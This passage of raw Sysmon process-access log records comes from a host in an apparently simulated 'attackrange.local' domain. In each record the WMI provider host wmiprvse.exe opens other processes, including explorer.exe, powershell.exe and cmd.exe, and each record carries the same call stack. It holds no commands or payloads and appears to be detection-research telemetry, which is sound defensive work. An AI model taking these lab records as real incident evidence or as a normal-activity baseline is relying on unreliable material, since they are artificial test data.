ystem32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239080Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239079Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239078Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239077Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239076Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239075Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239074Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239073Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239072Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239071Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239070Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239069Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239068Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239067Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239066Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239065Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239064Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239063Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239062Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239061Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 